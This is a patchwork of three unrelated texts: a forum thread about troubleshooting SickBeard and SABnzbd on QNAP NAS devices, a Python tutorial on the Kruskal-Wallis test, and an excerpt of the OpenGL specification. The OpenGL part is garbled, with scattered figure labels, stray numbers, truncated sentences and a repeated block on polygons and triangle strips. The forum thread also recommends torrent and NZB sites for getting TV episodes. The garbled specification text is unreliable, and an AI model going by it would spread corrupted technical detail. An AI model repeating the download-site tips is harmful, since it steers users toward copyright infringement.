Darkkith, when you look at Brian’s info (/share/CACHEDEV1_DATA/.qpkg/), does your .qpkg path start with the same? (versus mine: /share/MD0_DATA/.qpkg/) Different results when executed from the command-line versus from the browser can (IMO) cause differences in environment variables. I wish I knew enough about Python to make a dump of this to a file so we can compare. hans

Hi Hans. As mentioned, I am a Linux newbie, but from what I could work out (without much success) the path of Python in the script was the main issue. I attempted editing but had a few issues. Basically I gave up in frustration, downgraded my QNAP to 4.0.5 and everything worked as normal with no headaches….. so basically there must be an issue with the 4.1 firmware for QNAP. Sorry I cannot be more useful than that….. I hope this helps the other guys with 4.1 on here. Thanks again for your support, your site is great….. one of my bookmarks for sure…. now onto reading about the Raspberry Pi …. Neal

Don’t feel bad …. I would have done the same thing as well. hans

Well, I wasn’t able to solve the problem as yet. One suggestion from the QNAP forums was to install the Python qpkg, but I had the same errors after doing so. As mentioned in the thread, I ended up adding a cronjob to run sabToSickBeard.py regularly and so far that seems to be working.
I guess there may be a small race condition when files are being copied into the completed folder, but I think I can live with that for now. darkkith

I assume when QTS 4.1 becomes mainstream that this “issue” will either be fixed by QNAP (maybe they did something wrong in the beta), or plenty of users will jump on it to get the QPKG fixed … Too bad it didn’t work right out of the box though … It’s also unfortunate that I can’t test on my QNAP – I’d hate to screw things up. I have asked in the QNAP forums before if it would be possible to run QTS in a virtual machine (after all, it’s x86 Linux) for testing purposes, but of course the answer remains “No!” even from QNAP. This would have been the exact reason to have a virtual machine for testing before screwing up a working setup. Reading your post at the QNAP Forum, the user clinton.hall suggests missing packages … maybe we could try copying the Python directories from, say, QTS 4.0.5 to a QTS 4.1 setup, or at least compare the files? hans

Thanks for the tips here. Experienced the same on a 669 Pro using 4.1.1 firmware. Ended up rolling back to 4.0.5 and working fine again. Shaun

Thanks Shaun for posting your findings! It’s much appreciated! hans

Mine is the same as yours. Things can get a little confusing here, but I found a couple of other things… my SABnzbd appears to be running python2.6. It failed to start when I tried to make it use python2.7, complaining about pyOpenSSL. I didn’t want to open that can of worms unnecessarily, so I reverted to python2.6… I guess the OptWare package installed both for me… convenient. I believe the sabToSickbeard.py script is executing with python2.7, but I cannot really be certain yet. I am guessing this is the case because of the first line in the script: this resolves to the python2.7 bin. This is also how I was running the script manually… since then I have confirmed that running this script with python2.6 is also fine.
I also have posted to the QNAP forums; if I get a response there that is relevant I’ll try to link it back here. darkkith

Thanks Darkkith – good find with the Python versions and the path differences (at least we know it’s not the path). …. Mine actually has 2.5, 2.6, and 2.7 installed. If you find anything: please post it here … others will benefit from it (and maybe even myself if I switch to QTS 4.1) … hans

So I’ve followed your tutorial to a T and I’m running into an initial issue. I have no problem accessing SABnzbd and running through the wizard, but when it goes to restart, I cannot access SABnzbd anymore. Any idea why that might be? Dustin

I’m assuming that the admin page is not loading? If that’s the case:
– Make sure you entered the right port number (I use a non-standard port number for my own setup – maybe you did this as well)
– Try disabling, waiting a little bit, and re-enabling SABnzbd in the QNAP admin pages
As the QPKG gets updated frequently, you could consider getting the latest version from the QNAP Forum: Download SabNZBD here (it is supposed to automatically download the latest version). hans

I did download the latest after the first attempt yielded the same results. I have double checked the ports and also double checked the port forwarding on my router as a precaution. I’m at a loss…. Dustin

1) If you’re familiar with SSH and how to get into the QNAP, see if SABnzbd is running: This should return something like this: I’ve run into the issue in the past that (re)starting can actually take some time when there are a lot of items in the queue. (Probably not the case, but make sure it’s running with Python 2.6 or 2.7 – SABnzbd does not appear to work with Python 3.x.)
2) Make sure you use http:// (or https:// if you set that explicitly). Note: I think the default port is 7071; in my setup I use 8800, feel free to try either (I realize this sounds mundane).
3) I’m assuming you did the disable, enable trick already. Can you tell me what is happening?
Your browser refuses to load the SABnzbd admin page? Also: port forwarding is only relevant if you want to access SABnzbd from outside (i.e. not from home). hans

Ok, I figured out the problem with not having access: I was choosing the option of only being able to access SABnzbd from “this” computer rather than any computer. Anyways, that is solved. Next problem… when I choose categories, I don’t have the option to choose sabToSickBeard.py; the only option I get is None. What other folder would the script be located in? Dustin

Did you check out the message (second one in this list of comments – Jul 25 to Dazcon5)? hans

I use the SickBeard index Womble and the autonzb.co newznab server, but do I need more than 3? Because I have some problems downloading old episodes. Maria

Hi Maria, Quite a few only keep up with the most recent episodes. You might want to add at least one more – unfortunately, good ones are not always free. A good example is NZBPlanet.net – which is very cheap and a good NZB source. Even when adding more than just one, much older episodes or less popular series might be problematic in general, and to get those series complete you might have to resort to some manual searching at sites like, for example, NZB.cc (for NZBs) or KickAssTorrents (for torrents). hans

Attempting to install SABnzbdplus I get this error: SABnzbdplus 140815 installation failed. The following Optware packages must be installed: python26, py26-openssl, py26-cheetah, unrar, par2cmdline, unzip. I’m on a TS-412. Hesh

I think the TS-412 might be a non-Intel NAS (Marvell I think)? The error is basically saying, as far as I can see, that you need to install OptWare (a QPKG freely available through the admin pages of your QNAP). hans

I got OptWare and Py (2.7) installed.
When I try to install SABnzbd I get an error that says I need Py 2.6 and a few other components. I skipped that as I only want SB running. Hesh

Unfortunately, I cannot reproduce this error, since I’ve already got it running. It seems that the Python version check is not taking into account that 2.7 is suitable as well. Did SB install? And if so: did you try to run it? Or is it just crapping out and not installing? hans

Nope. SB tells me it can’t get to I was trying it over remote though, over the myCloud service. I’ll have a crack when I go home. Hesh

Guys, back to basics here. So I have SickRage running on my QNAP, and it has “snatched” the files I want from torrent sites, but is there any other application I can use to download the torrents? Does the built-in Download Manager download these torrents, or is SABnzbd the only option? I am not using newsgroups, only torrents, so I’m confused whether SABnzbd is required to download the shows as well? TIA, Matt

If I recall correctly, QNAP Download Manager does handle BitTorrent … I found this link confirming that. hans

I have everything going right until the download completes, and then I get this error: Exit(1) Can’t import autoProcessTV.py, make sure it’s in the same folder as /share/CACHEDEV1_DATA/.qpkg/SickBeard-TPB/autoProcessTV/sabToSickBeard.py Any ideas? I’ve made sure the post-processing scripts folder is correct: /share/CACHEDEV1_DATA/.qpkg/SickBeard-TPB/autoProcessTV Hence it’s not processing in SickBeard… Jeremy

In SickBeard under Post-Processing I have left TV Download Dir blank, Process Episode Method as Move, Extra Scripts blank, Move Associated Files checked, Rename Episodes checked, Scan and Process checked, Unpack unchecked, Use Failed Downloads unchecked.
Jeremy

Hi Jeremy, sorry to hear you’re running into an issue … the first thing I’d check is if the config file is set up right and if the autoProcessTV.py file is correct. You might want to look at the comments in this part of the comment section, especially this part. Hope this info helps … hans

Hey guys, I’m having a little issue with SickBeard. I’m always getting the information that SickBeard is unable to find the git executable. SickBeard is installed on a QNAP TVS-463 with Python 2.7 and Optware 2.99. I have also changed the git path in the config.ini file to /share/CACHEDEV1_DATA/.qpkg/git/opt/bin/git but it still doesn’t work… Does anyone have an idea? Thank you! Tim

In the log the error is:
May-15 20:37:35 DEBUG CHECKVERSION :: git output: /bin/sh: /share/CACHEDEV1_DATA/.qpkg/git: is a directory
May-15 20:37:35 DEBUG CHECKVERSION :: Git output: /bin/sh: /share/CACHEDEV1_DATA/.qpkg/git: is a directory
May-15 20:37:35 ERROR CHECKVERSION :: Output doesn’t look like a hash, not using it
Tim

Hi Tim, I’m sorry to hear that you’re having issues with SickBeard. I’m in the middle of moving from the US to the Netherlands, so I’m a little limited in how I can help. A quick look shows me that I’m running Optware 0.99.163 – I’m not sure what 2.99 would be? Typo? Anyhow, I got it from here. I’m running Python 2.7.5. I also do not have that git path available (git however works). Git on my QNAP can be found here: On yours it’s possibly Hope this helps you find the culprit. hans

Hi Hans, Thank you for your quick response! Of course I meant 0.99, to be precise the same as you have, 0.99.163. I looked in the Optware folder but there isn’t a git there. But I have a git folder under /.qpkg. This is also the folder I set in the config.ini. Tim

That’s strange … I do not have a git folder … and since it’s located there, I’d suspect you might have a git.qpkg installed (there is one in the “App-Center”)? hans

Hi Hans, thanks for your help. I found the folder.
Since the update it has been moved to /share/CACHEDEV1_DATA/.qpkg/Optware/libexec/git-core/git. However, SickBeard seems to work. The only problem I still have is setting up a provider. Is there one you prefer? Tim

Hi Tim! Good to hear SickBeard is running. As for a service, I’ve had very good experiences with GigaNews … hans

Hi Hans, Thank you! Tim

You’re most welcome Tim! hans
https://www.tweaking4all.com/home-theatre/qnap-sick-beard-sabnzbd-auto-download-tv-series/
A Kruskal-Wallis Test is used to determine whether or not there is a statistically significant difference between the medians of three or more independent groups. It is considered to be the non-parametric equivalent of the One-Way ANOVA. This tutorial explains how to conduct a Kruskal-Wallis Test in Python.

Example: Kruskal-Wallis Test in Python

Suppose researchers apply three different fertilizers to three groups of plants and measure the resulting growth. We can perform a Kruskal-Wallis Test to determine if the median growth is the same across the three groups.

Step 1: Enter the data.

First, we'll create three arrays to hold our plant measurements for each of the three groups:

group1 = [7, 14, 14, 13, 12, 9, 6, 14, 12, 8]
group2 = [15, 17, 13, 15, 15, 13, 9, 12, 10, 8]
group3 = [6, 8, 8, 9, 5, 14, 13, 8, 10, 9]

Step 2: Perform the Kruskal-Wallis Test.

Next, we'll perform a Kruskal-Wallis Test using the kruskal() function from the scipy.stats library:

from scipy import stats

#perform Kruskal-Wallis Test
stats.kruskal(group1, group2, group3)

KruskalResult(statistic=6.2878, pvalue=0.0431)

Since the p-value (0.0431) is less than 0.05, we can reject the null hypothesis that the median plant growth is the same across the three groups. We have sufficient evidence to conclude that the type of fertilizer used leads to statistically significant differences in plant growth.
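For intuition, the H statistic scipy reports can be reproduced by hand: pool the data, rank it (tied values share their mean rank), sum the ranks per group, apply the Kruskal-Wallis formula, and divide by a tie-correction factor. A stdlib-only sketch (not how scipy implements it internally):

```python
from collections import Counter

def kruskal_h(*groups):
    """Kruskal-Wallis H statistic with tie correction."""
    pooled = sorted(v for g in groups for v in g)
    n = len(pooled)
    # Average rank for each distinct value (ties share their mean rank).
    rank = {}
    i = 0
    while i < n:
        j = i
        while j < n and pooled[j] == pooled[i]:
            j += 1
        rank[pooled[i]] = (i + 1 + j) / 2.0  # mean of ranks i+1 .. j
        i = j
    # H = 12 / (n(n+1)) * sum(R_g^2 / n_g) - 3(n+1)
    h = 12.0 / (n * (n + 1)) * sum(
        sum(rank[v] for v in g) ** 2 / float(len(g)) for g in groups
    ) - 3 * (n + 1)
    # Correct for ties: divide by 1 - sum(t^3 - t) / (n^3 - n).
    ties = sum(t ** 3 - t for t in Counter(pooled).values())
    return h / (1 - ties / float(n ** 3 - n))

group1 = [7, 14, 14, 13, 12, 9, 6, 14, 12, 8]
group2 = [15, 17, 13, 15, 15, 13, 9, 12, 10, 8]
group3 = [6, 8, 8, 9, 5, 14, 13, 8, 10, 9]
print(round(kruskal_h(group1, group2, group3), 4))  # 6.2878, matching scipy
```

The tie correction matters here: without it, H for this data would be about 6.204 rather than 6.288, since there are many repeated growth values.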
https://www.statology.org/kruskal-wallis-test-python/
Mark Segal
Kurt Akeley

Contents

1 Introduction
1.1 Formatting of Optional Features
1.2 What is the OpenGL Graphics System?
1.3 Programmer's View of OpenGL
1.4 Implementor's View of OpenGL
1.5 Our View
1.6 Companion Documents
2 OpenGL Operation
2.1 OpenGL Fundamentals
2.1.1 Floating-Point Computation
2.2 GL State
2.3 GL Command Syntax
2.4 Basic GL Operation
2.5 GL Errors
2.6 Begin/End Paradigm
2.6.1 Begin and End
2.6.2 Polygon Edges
2.6.3 GL Commands within Begin/End
2.7 Vertex Specification
2.8 Vertex Arrays
2.9 Buffer Objects
2.9.1 Vertex Arrays in Buffer Objects
2.9.2 Array Indices in Buffer Objects
2.9.3 Buffer Object State
2.10 Rectangles
2.11 Coordinate Transformations
2.11.1 Controlling the Viewport
2.11.2 Matrices
3 Rasterization
3.1 Invariance
3.2 Antialiasing
3.2.1 Multisampling
3.3 Points
3.3.1 Basic Point Rasterization
3.3.2 Point Rasterization State
3.3.3 Point Multisample Rasterization
3.4 Line Segments
3.4.1 Basic Line Segment Rasterization
3.4.2 Other Line Segment Features
3.4.3 Line Rasterization State
3.4.4 Line Multisample Rasterization
3.5 Polygons
3.5.1 Basic Polygon Rasterization
3.5.2 Stippling
3.5.3 Antialiasing
3.5.4 Options Controlling Polygon Rasterization
3.5.5 Depth Offset
A Invariance
A.1 Repeatability
A.2 Multi-pass Algorithms
A.3 Invariance Rules
A.4 What All This Means
B Corollaries

List of Figures

3.1 Rasterization.
3.2 Rasterization of non-antialiased wide points.
3.3 Rasterization of antialiased wide points.
3.4 Visualization of Bresenham's algorithm.
3.5 Rasterization of non-antialiased wide lines.
3.6 The region used in rasterizing an antialiased line segment.
3.7 Operation of DrawPixels.
3.8 Selecting a subimage from an image.
3.9 A bitmap and its associated parameters.
3.10 A texture image and the coordinates used to access it.
3.11 Multitexture pipeline.

1 Introduction

This document describes the OpenGL graphics system: what it is, how it acts, and what is required to implement it. We assume that the reader has at least a rudimentary understanding of computer graphics. This means familiarity with the essentials of computer graphics algorithms as well as familiarity with basic graphics hardware and associated terms.

2 OpenGL Operation

2.1 OpenGL Fundamentals

Finally, command names, constants, and types are prefixed in the GL (by gl, GL_, and GL, respectively in C) to reduce name clashes with other packages. The prefixes are omitted in this document for clarity.

2.2 GL State

The GL maintains considerable state. This document enumerates each state variable and describes how each variable can be changed. For purposes of discussion, state variables are categorized somewhat arbitrarily by their function. Although we describe the operations that the GL performs on the framebuffer, the framebuffer is not a part of GL state.

We distinguish two types of state. The first type of state, called GL server state, resides in the GL server. The majority of GL state falls into this category. The second type of state, called GL client state, resides in the GL client. Unless otherwise specified, all state referred to in this document is GL server state.

2.3 GL Command Syntax

These examples show the ANSI C declarations for these commands. In general, a command declaration has the form[1]

rtype is the return type of the function.
The braces ({}) enclose a series of characters (or character pairs) of which one is selected. ε indicates no character. The arguments enclosed in brackets ([args ,] and [, args]) may or may not be present.

[1] The declarations shown in this document apply to ANSI C. Languages such as C++ and Ada that allow passing of argument type information admit simpler declarations and fewer entry points.

The N arguments arg1 through argN have type T, which corresponds to one of the type letters or letter pairs as indicated in table 2.1 (if there are no letters, then the arguments' type is given explicitly). If the final character is not v, then N is given by the digit 1, 2, 3, or 4 (if there is no digit, then the number of arguments is fixed). If the final character is v, then only arg1 is present and it is an array of N values of the indicated type. Finally, we indicate an unsigned type by the shorthand of prepending a u to the beginning of the type name (so that, for instance, unsigned char is abbreviated uchar). The GL data types are summarized in table 2.2.

Table 2.2: GL data types. GL types are not C types. Thus, for example, GL type int is referred to as GLint outside this document, and is not necessarily equivalent to the C type int. An implementation may use more bits than the number indicated in the table to represent a GL type. Correct interpretation of integer values outside the minimum range is not required, however. ptrbits is the number of bits required to represent a pointer type; in other words, types intptr and sizeiptr must be sufficiently large as to store any address.

[Figure: block diagram of GL operation, showing the display list, evaluator, per-vertex operations / primitive assembly, rasterization, per-fragment operations, framebuffer, texture memory, and pixel operations stages.]

…back from the framebuffer or copied from one portion of the framebuffer to another.
This ordering is meant only as a tool for describing the GL, not as a strict ruleof how the GL is implemented, and we present it only as a means to organize thevarious operations of the GL. Objects such as curved surfaces, for instance, maybe transformed before they are converted to polygons. 2.5 GL ErrorsThe GL detects only a subset of those conditions that could be considered errors.This is because in many cases error checking would adversely impact the perfor-mance of an error-free program. The command Otherwise, errors are generated only for conditions that are explicitly described inthis specification. Vertex Coordinates In Current Texture texgen texture matrix 0 Coord Set 0 Current Texture texgen texture matrix 1 Coord Set 1 Current Texture texgen texture matrix 2 Coord Set 2 Current Texture texgen texture matrix 3 Coord Set 3 Figure 2.2. Association of current values with a vertex. The heavy lined boxes rep- resent GL state. Four texture units are shown; however, multitexturing may support a different number of units depending on the implementation. Point culling; Line Segment Coordinates Point, or Polygon Line Segment, or Clipping Processed Polygon Rasterization Vertices Associated (Primitive) Data Assembly Color Processing Begin/End State itives, clipping may insert new vertices into the primitive. The vertices defining aprimitive to be rasterized have texture coordinates and colors associated with them. There is no limit on the number of vertices that may be specified between a Beginand an End. Points. A series of individual points may be specified by calling Begin with anargument value of POINTS. No special state need be kept between Begin and Endin this case, since each point is independent of previous and following points. Line Strips. A series of one or more connected line segments is specified byenclosing a series of two or more endpoints within a Begin/End pair when Begin iscalled with LINE STRIP. 
In this case, the first vertex specifies the first segment's start point while the second vertex specifies the first segment's endpoint and the second segment's start point. In general, the ith vertex (for i > 1) specifies the beginning of the ith segment and the end of the (i − 1)st. The last vertex specifies the end of the last segment. If only one vertex is specified between the Begin/End pair, then no primitive is generated.

The required state consists of the processed vertex produced from the last vertex that was sent (so that a line segment can be generated from it to the current vertex), and a boolean flag indicating if the current vertex is the first vertex.

Line Loops. Line loops, specified with the LINE_LOOP argument value to Begin, are the same as line strips except that a final segment is added from the final specified vertex to the first vertex. The additional state consists of the processed first vertex.

Separate Lines. Individual line segments, each specified by a pair of vertices, are generated by surrounding vertex pairs with Begin and End when the value of the argument to Begin is LINES. In this case, the first two vertices between a Begin and End pair define the first segment, with subsequent pairs of vertices each defining one more segment. If the number of specified vertices is odd, then the last one is ignored. The state required is the same as for lines but it is used differently: a vertex holding the first vertex of the current segment, and a boolean flag indicating whether the current vertex is odd or even (a segment start or end).

Polygons. A polygon is described by specifying its boundary as a series of line segments. When Begin is called with POLYGON, the bounding line segments are specified in the same way as line loops. Depending on the current state of the GL, a polygon may be rendered in one of several ways such as outlining its border or filling its interior. A polygon described with fewer than three vertices does not generate a primitive.

Only convex polygons are guaranteed to be drawn correctly by the GL. If a specified polygon is nonconvex when projected onto the window, then the rendered polygon need only lie within the convex hull of the projected vertices defining its boundary.

The state required to support polygons consists of at least two processed vertices (more than two are never required, although an implementation may use more); this is because a convex polygon can be rasterized as its vertices arrive, before all of them have been specified. The order of the vertices is significant in lighting and polygon rasterization (see sections 2.14.1 and 3.5.1).

Triangle strips. A triangle strip is a series of triangles connected along shared edges. A triangle strip is specified by giving a series of defining vertices between a Begin/End pair when Begin is called with TRIANGLE_STRIP. In this case, the first three vertices define the first triangle (and their order is significant, just as for polygons). Each subsequent vertex defines a new triangle using that point along with two vertices from the previous triangle. A Begin/End pair enclosing fewer than three vertices, when TRIANGLE_STRIP has been supplied to Begin, produces no primitive. See figure 2.4.

The state required to support triangle strips consists of a flag indicating if the first triangle has been completed, two stored processed vertices, (called vertex A
Only convex polygons are guaranteed to be drawn correctly by the GL. If aspecified polygon is nonconvex when projected onto the window, then the renderedpolygon need only lie within the convex hull of the projected vertices defining itsboundary. The state required to support polygons consists of at least two processed ver-tices (more than two are never required, although an implementation may usemore); this is because a convex polygon can be rasterized as its vertices arrive,before all of them have been specified. The order of the vertices is significant inlighting and polygon rasterization (see sections 2.14.1 and 3.5.1). Triangle strips. A triangle strip is a series of triangles connected along sharededges. A triangle strip is specified by giving a series of defining vertices betweena Begin/End pair when Begin is called with TRIANGLE STRIP. In this case, thefirst three vertices define the first triangle (and their order is significant, just as forpolygons). Each subsequent vertex defines a new triangle using that point alongwith two vertices from the previous triangle. A Begin/End pair enclosing fewerthan three vertices, when TRIANGLE STRIP has been supplied to Begin, producesno primitive. See figure 2.4. The state required to support triangle strips consists of a flag indicating if thefirst triangle has been completed, two stored processed vertices, (called vertex A 2 4 2 2 3 6 4 4 5 5 1 3 5 1 1. and vertex B), and a one bit pointer indicating which stored vertex will be replacedwith the next vertex. After a Begin(TRIANGLE STRIP), the pointer is initializedto point to vertex A. Each vertex sent between a Begin/End pair toggles the pointer.Therefore, the first vertex is stored as vertex A, the second stored as vertex B, thethird stored as vertex A, and so on. Any vertex after the second one sent forms atriangle from vertex A, vertex B, and the current vertex (in that order). Triangle fans. 
A triangle fan is the same as a triangle strip with one exception:each vertex after the first always replaces vertex B of the two stored vertices. Thevertices of a triangle fan are enclosed between Begin and End when the value ofthe argument to Begin is TRIANGLE FAN. Separate Triangles. Separate triangles are specified by placing vertices be-tween Begin and End when the value of the argument to Begin is TRIANGLES. Inthis case, The 3i + 1st, 3i + 2nd, and 3i + 3rd vertices (in that order) determinea triangle for each i = 0, 1, . . . , n − 1, where there are 3n + k vertices betweenthe Begin and End. k is either 0, 1, or 2; if k is not zero, the final k vertices areignored. For each triangle, vertex A is vertex 3i and vertex B is vertex 3i + 1.Otherwise, separate triangles are the same as a triangle strip. The rules given for polygons also apply to each triangle generated from a tri-angle strip, triangle fan or from separate triangles. Quadrilateral (quad) strips. Quad strips generate a series of edge-sharingquadrilaterals from vertices appearing between Begin and End, when Begin is 2 4 6 2 3 6 7 1 3 5 1 4 5 8 (a) (b) Figure 2.5. (a) A quad strip. (b) Independent quads. The numbers give the sequenc- ing of the vertices between Begin and End. called with QUAD STRIP. If the m vertices between the Begin and End arev1 , . . . , vm , where vj is the jth specified vertex, then quad i has vertices (in or-der) v2i , v2i+1 , v2i+3 , and v2i+2 with i = 0, . . . , bm/2c. The state required is thusthree processed vertices, to store the last two vertices of the previous quad alongwith the third vertex (the first new vertex) of the current quad, a flag to indicatewhen the first quad has been completed, and a one-bit counter to count membersof a vertex pair. See figure 2.5. A quad strip with fewer than four vertices generates no primitive. If the numberof vertices specified for a quadrilateral strip between Begin and End is odd, thefinal vertex is ignored. 
Separate Quadrilaterals. Separate quads are just like quad strips except that each group of four vertices, the 4j + 1st, the 4j + 2nd, the 4j + 3rd, and the 4j + 4th, generate a single quad, for j = 0, 1, ..., n − 1. The total number of vertices between Begin and End is 4n + k, where 0 ≤ k ≤ 3; if k is not zero, the final k vertices are ignored. Separate quads are generated by calling Begin with the argument value QUADS.

The rules given for polygons also apply to each quad generated in a quad strip or from separate quads.

The state required for Begin and End consists of an eleven-valued integer indicating either one of the ten possible Begin/End modes, or that no Begin/End mode is being processed.

The commands

void EdgeFlag( boolean flag );
void EdgeFlagv( boolean *flag );

are used to change the value of a flag bit. If flag is zero, then the flag bit is set to FALSE; if flag is non-zero, then the flag bit is set to TRUE.

When Begin is supplied with one of the argument values POLYGON, TRIANGLES, or QUADS, each vertex specified within a Begin and End pair begins an edge. If the edge flag bit is TRUE, then each specified vertex begins an edge that is flagged as boundary. If the bit is FALSE, then induced edges are flagged as non-boundary.

The state required for edge flagging consists of one current flag bit. Initially, the bit is TRUE. In addition, each processed vertex of an assembled polygonal primitive must be augmented with a bit indicating whether or not the edge beginning on that vertex is boundary or non-boundary.

The MultiTexCoord commands take the coordinate set to be modified as the texture parameter. texture is a symbolic constant of the form TEXTUREi, indicating that texture coordinate set i is to be modified. The constants obey TEXTUREi = TEXTURE0 + i (i is in the range 0 to k − 1, where k is the implementation-dependent number of texture coordinate sets defined by MAX_TEXTURE_COORDS).

The TexCoord commands are exactly equivalent to the corresponding MultiTexCoord commands with texture set to TEXTURE0.
Gets of CURRENT_TEXTURE_COORDS return the texture coordinate set defined by the value of ACTIVE_TEXTURE.

Specifying an invalid texture coordinate set for the texture argument of MultiTexCoord results in undefined behavior.

The current normal is set using the Normal3 commands.

There are several ways to set the current color and secondary color. The GL stores a current single-valued color index, as well as a current four-valued RGBA color and secondary color. Either the index or the color and secondary color are significant depending as the GL is in color index mode or RGBA mode. The mode selection is made when the GL is initialized.

The commands to set RGBA colors are the Color and SecondaryColor families. The Color command has two major variants: Color3 and Color4. The four value versions set all four values. The three value versions set R, G, and B to the provided values; A is set to 1.0. (The conversion of integer color components (R, G, B, and A) to floating-point values is discussed in section 2.14.)

The secondary color has only the three value versions. Secondary A is always set to 1.0.

The Index command updates the current (single-valued) color index. It takes one argument, the value to which the current color index should be set. Values outside the (machine-dependent) representable range of color indices are not clamped.

Vertex shaders (see section 2.15) can be written to access an array of 4-component generic vertex attributes in addition to the conventional attributes specified previously. The first slot of this array is numbered 0, and the size of the array is specified by the implementation-dependent constant MAX_VERTEX_ATTRIBS.

The VertexAttrib* commands can be used to load the given value(s) into the generic attribute at slot index, whose components are named x, y, z, and w. The VertexAttrib1* family of commands sets the x coordinate to the provided single argument while setting y and z to 0 and w to 1.
Similarly, VertexAttrib2* commands set x and y to the specified values, z to 0 and w to 1; VertexAttrib3* commands set x, y, and z, with w set to 1, and VertexAttrib4* commands set all four coordinates. The error INVALID_VALUE is generated if index is greater than or equal to MAX_VERTEX_ATTRIBS.

The VertexAttrib4N* commands also specify vertex attributes with fixed-point coordinates that are scaled to a normalized range, according to table 2.9.

The VertexAttrib* entry points defined earlier can also be used to load attributes declared as a matrix in a vertex shader. Each column of a matrix takes up one generic 4-component attribute slot out of the MAX_VERTEX_ATTRIBS available slots. Matrices are loaded into these slots in column major order. Matrix columns need to be loaded in increasing slot numbers.

Setting generic vertex attribute zero specifies a vertex; the four vertex coordinates are taken from the values of attribute zero. A Vertex2, Vertex3, or Vertex4 command is completely equivalent to the corresponding VertexAttrib* command with an index of zero. Setting any other generic vertex attribute updates the current values of the attribute. There are no current values for vertex attribute zero.

There is no aliasing among generic attributes and conventional attributes. In other words, an application can set all MAX_VERTEX_ATTRIBS generic attributes and all conventional attributes without fear of one particular attribute overwriting the value of another attribute.
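The default-filling rule for VertexAttrib1/2/3/4 can be sketched as a plain function. The struct and helper below are invented for illustration and are not part of the GL API.

```c
#include <assert.h>

/* Sketch: how VertexAttrib1/2/3/4 fill in unspecified components.
 * Components not supplied default to y = 0, z = 0, w = 1, as described above. */
typedef struct { float x, y, z, w; } attrib4;

attrib4 attrib_from(const float *v, int ncomp) {
    attrib4 a = { 0.0f, 0.0f, 0.0f, 1.0f };   /* defaults before filling */
    if (ncomp >= 1) a.x = v[0];
    if (ncomp >= 2) a.y = v[1];
    if (ncomp >= 3) a.z = v[2];
    if (ncomp >= 4) a.w = v[3];
    return a;
}
```

For example, a VertexAttrib1-style call with value 5 yields (5, 0, 0, 1), and a VertexAttrib3-style call with (5, 6, 7) yields (5, 6, 7, 1).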
The state required to support vertex specification consists of four floating-point numbers per texture coordinate set to store the current texture coordinates s, t, r, and q, three floating-point numbers to store the three coordinates of the current normal, one floating-point number to store the current fog coordinate, four floating-point values to store the current RGBA color, four floating-point values to store the current RGBA secondary color, one floating-point value to store the current color index, and MAX_VERTEX_ATTRIBS − 1 four-component floating-point vectors to store generic vertex attributes.

There is no notion of a current vertex, so no state is devoted to vertex coordinates or generic attribute zero. The initial texture coordinates are (s, t, r, q) = (0, 0, 0, 1) for each texture coordinate set. The initial current normal has coordinates (0, 0, 1). The initial fog coordinate is zero. The initial RGBA color is (R, G, B, A) = (1, 1, 1, 1) and the initial RGBA secondary color is (0, 0, 0, 1). The initial color index is 1. The initial values for all generic vertex attributes are (0, 0, 0, 1).

The various *Pointer commands describe the locations and organizations of these arrays. For each command, type specifies the data type of the values stored in the array. Because edge flags are always type boolean, EdgeFlagPointer has no type argument. size, when present, indicates the number of values per vertex that are stored in the array. Because normals are always specified with three values, NormalPointer has no size argument. Likewise, because color indices and edge flags are always specified with a single value, IndexPointer and EdgeFlagPointer also have no size argument. Table 2.4 indicates the allowable values for size and type (when present). For type the values BYTE, SHORT, INT, FLOAT, and DOUBLE indicate types byte, short, int, float, and double, respectively; and the values UNSIGNED_BYTE, UNSIGNED_SHORT, and UNSIGNED_INT indicate types ubyte, ushort, and uint, respectively.
The error INVALID_VALUE is generated if size is specified with a value other than that indicated in the table.

The index parameter in the VertexAttribPointer command identifies the generic vertex attribute array being described. The error INVALID_VALUE is generated if index is greater than or equal to MAX_VERTEX_ATTRIBS. The normalized parameter in the VertexAttribPointer command identifies whether fixed-point types should be normalized when converted to floating-point.

Table 2.4: Vertex array sizes (values per vertex) and data types. The "normalized" column indicates whether fixed-point types are accepted directly or normalized to [0, 1] (for unsigned types) or [−1, 1] (for signed types). For generic vertex attributes, fixed-point data are normalized if and only if the VertexAttribPointer normalized flag is set.

Generic vertex attribute arrays are enabled and disabled with the commands EnableVertexAttribArray and DisableVertexAttribArray, where index identifies the generic vertex attribute array to enable or disable. The error INVALID_VALUE is generated if index is greater than or equal to MAX_VERTEX_ATTRIBS.

The command

void ClientActiveTexture( enum texture );

selects the vertex array client state parameters to be modified by the TexCoordPointer command. Specifying an invalid texture generates the error INVALID_ENUM. Valid values of texture are the same as for the MultiTexCoord commands described in section 2.7.

The command

void ArrayElement( int i );

transfers the ith element of every enabled array to the GL. The effect of ArrayElement(i) is the same as the effect of the command sequence that specifies the corresponding attribute for each enabled array.

The command

void DrawArrays( enum mode, int first, sizei count );

constructs a sequence of geometric primitives using elements first through first + count − 1 of each enabled array. The effect is the same as the effect of an equivalent sequence of ArrayElement commands enclosed in a Begin/End pair, with one exception: the current normal coordinates, color, secondary color, color index, edge flag, fog coordinate, texture coordinates, and generic attributes are each indeterminate after execution of DrawArrays, if the corresponding array is enabled. Current values corresponding to disabled arrays are not modified by the execution of DrawArrays.

Specifying first < 0 results in undefined behavior. Generating the error INVALID_VALUE is recommended in this case.
The command

void DrawElements( enum mode, sizei count, enum type, void *indices );

constructs a sequence of geometric primitives using the count elements whose indices are stored in indices. The effect is the same as the effect of an equivalent sequence of ArrayElement commands, with one exception: the current normal coordinates, color, secondary color, color index, edge flag, fog coordinate, texture coordinates, and generic attributes are each indeterminate after the execution of DrawElements, if the corresponding array is enabled. Current values corresponding to disabled arrays are not modified by the execution of DrawElements.

The command

void DrawRangeElements( enum mode, uint start, uint end, sizei count, enum type, void *indices );

is a restricted form of DrawElements. mode, count, type, and indices match the corresponding arguments to DrawElements, with the additional constraint that all values in the array indices must lie between start and end inclusive.

Implementations denote recommended maximum amounts of vertex and index data, which may be queried by calling GetIntegerv with the symbolic constants MAX_ELEMENTS_VERTICES and MAX_ELEMENTS_INDICES. If end − start + 1 is greater than the value of MAX_ELEMENTS_VERTICES, or if count is greater than the value of MAX_ELEMENTS_INDICES, then the call may operate at reduced performance. There is no requirement that all vertices in the range [start, end] be referenced. However, the implementation may partially process unused vertices, reducing performance from what could be achieved with an optimal index set.

The error INVALID_VALUE is generated if end < start. Invalid mode, count, or type parameters generate the same errors as would the corresponding call to DrawElements. It is an error for indices to lie outside the range [start, end], but implementations may not check for this. Such indices will cause implementation-dependent behavior.

The command

void InterleavedArrays( enum format, sizei stride, void *pointer );

